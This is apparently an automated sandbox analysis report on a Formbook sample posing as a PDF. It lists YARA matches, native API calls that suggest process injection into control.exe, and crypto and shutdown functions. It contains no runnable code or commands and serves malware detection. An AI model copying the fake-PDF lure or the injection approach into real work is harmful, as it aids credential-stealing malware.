Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004181B0 NtCreateFile, 2_2_004181B0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00418260 NtReadFile, 2_2_00418260
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004182E0 NtClose, 2_2_004182E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00418390 NtAllocateVirtualMemory, 2_2_00418390
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004182DC NtClose, 2_2_004182DC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00A098F0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00A09860
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk, 2_2_00A09840
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk, 2_2_00A099A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_00A09910
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk, 2_2_00A09A20
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00A09A00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk, 2_2_00A09A50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk, 2_2_00A095D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk, 2_2_00A09540
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00A096E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_00A09660
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_00A097A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk, 2_2_00A09780
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk, 2_2_00A09FE0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk, 2_2_00A09710
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A098A0 NtWriteVirtualMemory, 2_2_00A098A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09820 NtEnumerateKey, 2_2_00A09820
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0B040 NtSuspendThread, 2_2_00A0B040
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A099D0 NtCreateProcessEx, 2_2_00A099D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09950 NtQueueApcThread, 2_2_00A09950
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A80 NtOpenDirectoryObject, 2_2_00A09A80
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A10 NtQuerySection, 2_2_00A09A10
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A3B0 NtGetContextThread, 2_2_00A0A3B0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09B00 NtSetValueKey, 2_2_00A09B00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A095F0 NtQueryInformationFile, 2_2_00A095F0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09520 NtWaitForSingleObject, 2_2_00A09520
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0AD30 NtSetContextThread, 2_2_00A0AD30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09560 NtWriteFile, 2_2_00A09560
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A096D0 NtCreateKey, 2_2_00A096D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09610 NtEnumerateValueKey, 2_2_00A09610
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09670 NtQueryInformationProcess, 2_2_00A09670
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09650 NtQueryValueKey, 2_2_00A09650
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09730 NtQueryVirtualMemory, 2_2_00A09730
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A710 NtOpenProcessToken, 2_2_00A0A710
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09760 NtOpenProcess, 2_2_00A09760
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09770 NtSetInformationFile, 2_2_00A09770
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A770 NtOpenThread, 2_2_00A0A770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk, 7_2_047D9540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk, 7_2_047D95D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_047D9660
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk, 7_2_047D9650
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_047D96E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk, 7_2_047D96D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk, 7_2_047D9710
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk, 7_2_047D9FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk, 7_2_047D9780
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_047D9860
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk, 7_2_047D9840
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_047D9910
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk, 7_2_047D99A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk, 7_2_047D9A50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9560 NtWriteFile, 7_2_047D9560
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DAD30 NtSetContextThread, 7_2_047DAD30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9520 NtWaitForSingleObject, 7_2_047D9520
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D95F0 NtQueryInformationFile, 7_2_047D95F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9670 NtQueryInformationProcess, 7_2_047D9670
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9610 NtEnumerateValueKey, 7_2_047D9610
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA770 NtOpenThread, 7_2_047DA770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9770 NtSetInformationFile, 7_2_047D9770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9760 NtOpenProcess, 7_2_047D9760
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9730 NtQueryVirtualMemory, 7_2_047D9730
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA710 NtOpenProcessToken, 7_2_047DA710
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D97A0 NtUnmapViewOfSection, 7_2_047D97A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DB040 NtSuspendThread, 7_2_047DB040
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9820 NtEnumerateKey, 7_2_047D9820
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D98F0 NtReadVirtualMemory, 7_2_047D98F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D98A0 NtWriteVirtualMemory, 7_2_047D98A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9950 NtQueueApcThread, 7_2_047D9950
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D99D0 NtCreateProcessEx, 7_2_047D99D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A20 NtResumeThread, 7_2_047D9A20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A10 NtQuerySection, 7_2_047D9A10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A00 NtProtectVirtualMemory, 7_2_047D9A00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A80 NtOpenDirectoryObject, 7_2_047D9A80
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9B00 NtSetValueKey, 7_2_047D9B00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA3B0 NtGetContextThread, 7_2_047DA3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007181B0 NtCreateFile, 7_2_007181B0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00718260 NtReadFile, 7_2_00718260
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007182E0 NtClose, 7_2_007182E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00718390 NtAllocateVirtualMemory, 7_2_00718390
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007182DC NtClose, 7_2_007182DC
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040314A
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004046A7 0_2_004046A7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00408C4B 2_2_00408C4B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00408C50 2_2_00408C50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041BD8E 2_2_0041BD8E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041C5A1 2_2_0041C5A1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B5A1 2_2_0041B5A1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A920A8 2_2_00A920A8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB090 2_2_009DB090
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A928EC 2_2_00A928EC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9E824 2_2_00A9E824
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A81002 2_2_00A81002
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CF900 2_2_009CF900
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A922AE 2_2_00A922AE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FA2B 2_2_00A7FA2B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FEBB0 2_2_009FEBB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A803DA 2_2_00A803DA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8DBD2 2_2_00A8DBD2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92B28 2_2_00A92B28
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAB40 2_2_009EAB40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D841F 2_2_009D841F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8D466 2_2_00A8D466
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2581 2_2_009F2581
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A925DD 2_2_00A925DD
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DD5E0 2_2_009DD5E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92D07 2_2_00A92D07
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C0D20 2_2_009C0D20
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A91D55 2_2_00A91D55
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92EF7 2_2_00A92EF7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E6E30 2_2_009E6E30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8D616 2_2_00A8D616
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A91FF1 2_2_00A91FF1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9DFCE 2_2_00A9DFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A841F 7_2_047A841F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485D466 7_2_0485D466
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04790D20 7_2_04790D20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048625DD 7_2_048625DD
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862D07 7_2_04862D07
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AD5E0 7_2_047AD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861D55 7_2_04861D55
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B6E30 7_2_047B6E30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862EF7 7_2_04862EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485D616 7_2_0485D616
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486DFCE 7_2_0486DFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861FF1 7_2_04861FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048620A8 7_2_048620A8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048628EC 7_2_048628EC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851002 7_2_04851002
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486E824 7_2_0486E824
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB090 7_2_047AB090
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479F900 7_2_0479F900
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048622AE 7_2_048622AE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485DBD2 7_2_0485DBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048503DA 7_2_048503DA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862B28 7_2_04862B28
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CEBB0 7_2_047CEBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00708C50 7_2_00708C50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00708C4B 7_2_00708C4B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071C5A1 7_2_0071C5A1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702D90 7_2_00702D90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702D87 7_2_00702D87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702FB0 7_2_00702FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: String function: 009CB150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0479B150 appears 39 times
PE file contains strange resources
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Uses 32bit PE files
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
